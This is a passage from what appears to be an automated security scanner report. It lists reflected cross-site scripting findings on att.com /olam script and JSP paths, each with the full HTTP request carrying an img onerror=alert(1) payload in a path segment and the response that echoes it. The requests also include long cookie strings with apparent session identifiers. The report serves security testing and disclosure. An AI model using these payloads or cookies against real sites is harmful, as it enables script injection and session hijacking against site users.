foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9084
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:32 GMT
Connection: keep-alive
Set-Cookie: TLTHID=99D8F6AE0B8C100B76B3DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/sniffer.js3ce05"><img src=a onerror=alert(1)>0460bed6911">
...[SNIP]...

1.41. https://www.att.com/olam/js/validate.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/validate.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32b6"><img%20src%3da%20onerror%3dalert(1)>a2755334a3d was submitted in the REST URL parameter 2. This input was echoed as f32b6"><img src=a onerror=alert(1)>a2755334a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsf32b6"><img%20src%3da%20onerror%3dalert(1)>a2755334a3d/validate.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9085
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:27 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsf32b6"><img src=a onerror=alert(1)>a2755334a3d/validate.js">
...[SNIP]...

1.42. https://www.att.com/olam/js/validate.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/validate.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff1"><img%20src%3da%20onerror%3dalert(1)>a0520a3360b was submitted in the REST URL parameter 3. This input was echoed as 5aff1"><img src=a onerror=alert(1)>a0520a3360b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/validate.js5aff1"><img%20src%3da%20onerror%3dalert(1)>a0520a3360b HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9085
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:36 GMT
Connection: keep-alive
Set-Cookie: TLTHID=9C23F7100B8C100B76D7DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/validate.js5aff1"><img src=a onerror=alert(1)>a0520a3360b">
...[SNIP]...

1.43. https://www.att.com/olam/js/vidSwitcher.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/vidSwitcher.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83665"><img%20src%3da%20onerror%3dalert(1)>8349ab0b616 was submitted in the REST URL parameter 2. This input was echoed as 83665"><img src=a onerror=alert(1)>8349ab0b616 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js83665"><img%20src%3da%20onerror%3dalert(1)>8349ab0b616/vidSwitcher.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js83665"><img src=a onerror=alert(1)>8349ab0b616/vidSwitcher.js">
...[SNIP]...

1.44. https://www.att.com/olam/js/vidSwitcher.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/vidSwitcher.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a324"><img%20src%3da%20onerror%3dalert(1)>9ece5848fb6 was submitted in the REST URL parameter 3. This input was echoed as 9a324"><img src=a onerror=alert(1)>9ece5848fb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/vidSwitcher.js9a324"><img%20src%3da%20onerror%3dalert(1)>9ece5848fb6 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=988F755C0B8C100B76A0DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/vidSwitcher.js9a324"><img src=a onerror=alert(1)>9ece5848fb6">
...[SNIP]...

1.45. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bd7"><img%20src%3da%20onerror%3dalert(1)>35ba005d529 was submitted in the REST URL parameter 2. This input was echoed as 67bd7"><img src=a onerror=alert(1)>35ba005d529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp67bd7"><img%20src%3da%20onerror%3dalert(1)>35ba005d529/tiles/common_includes/cGateCookie.jsp?userType= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221,"cp":{"ctn":"","customer_type":"current","user_type":"UVERSE"}}; fsr.a=1292775474876

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9112
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:33 GMT
Connection: keep-alive
Set-Cookie: TLTHID=9A47EFC80B8C100B76BBDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp67bd7"><img src=a onerror=alert(1)>35ba005d529/tiles/common_includes/cGateCookie.jsp">
...[SNIP]...

1.46. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a4e"><img%20src%3da%20onerror%3dalert(1)>4893a1d3d60 was submitted in the REST URL parameter 3. This input was echoed as b6a4e"><img src=a onerror=alert(1)>4893a1d3d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tilesb6a4e"><img%20src%3da%20onerror%3dalert(1)>4893a1d3d60/common_includes/cGateCookie.jsp?userType= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221,"cp":{"ctn":"","customer_type":"current","user_type":"UVERSE"}}; fsr.a=1292775474876

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9112
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:39 GMT
Connection: keep-alive
Set-Cookie: TLTHID=9DDD07F40B8C100B76F0DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tilesb6a4e"><img src=a onerror=alert(1)>4893a1d3d60/common_includes/cGateCookie.jsp">
...[SNIP]...

1.47. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f64"><img%20src%3da%20onerror%3dalert(1)>22c2a5fbd8d was submitted in the REST URL parameter 4. This input was echoed as d3f64"><img src=a onerror=alert(1)>22c2a5fbd8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

